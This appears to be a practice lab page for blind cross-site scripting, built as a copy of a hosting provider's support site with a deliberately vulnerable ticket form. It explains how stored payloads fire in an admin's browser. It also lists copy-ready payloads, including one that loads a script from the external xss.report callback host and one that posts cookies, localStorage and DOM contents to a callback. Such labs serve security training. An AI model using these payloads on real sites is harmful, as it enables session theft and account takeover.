🔬 LAB 64 — Blind XSS | This is a replica of the ZAP-Hosting support page. Click Support in the nav to open the vulnerable ticket form. | Admin Panel · XSS Callbacks · ← Back to Labs
SERVER INSTANT ONLINE · configure, pay, enjoy!

Server hosting with the new
ZAP 2.5 — Unique, Elegant and Fast

How important is an intuitive, modern and mobile optimised web panel for managing your servers to you? It is just as important to us as fast, DDoS-protected and fail-safe game servers. You're just one button away from being thrilled. 🎉

DDoS-protected servers across 15+ locations
Instant setup — server online in under 60 seconds
FiveM, Minecraft, ARK, Rust and 100+ game servers
24/7 support via ticket & live chat

Server hosting with the new ZAP 2.5

or sign up with
20247+
Active servers
13283
Active Lifetime Server
125
Orders yesterday
25003 ♥
for ZAP
🔬 Lab 64 — Blind XSS via Support Ticket
Click Support ▼ in the nav (or the floating chat icon) to open the ticket form. Submit a payload → then visit the Admin Panel to trigger the XSS.
What is Blind XSS?
1
Submit payload in Name/Subject/Message — you see nothing fire here (it's blind).
2
Payload stored raw in DB without sanitisation.
3
Admin opens ticketinnerHTML renders payload → XSS fires in admin's browser.
4
Attacker gets callback with cookies, IP, DOM via xss.report.
Try These Payloads
Click to copy → paste into the ticket form fields:
Basic alert
<img src=x onerror=alert(document.domain)>
From the real report
direct';"></textarea></script><script/src=//xss.report/c/rix4uni></script>
Data exfiltration
<img src=x onerror="fetch('64.php?action=xss_callback',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({ticket_id:0,uri:location.href,cookies:document.cookie,referrer:document.referrer,user_agent:navigator.userAgent,origin:location.origin,local_storage:JSON.stringify(localStorage),dom:document.documentElement.outerHTML.substring(0,500)})})"> </div>
Create ticket via mail
average response time: 14 Minute(s)
I'm not a robot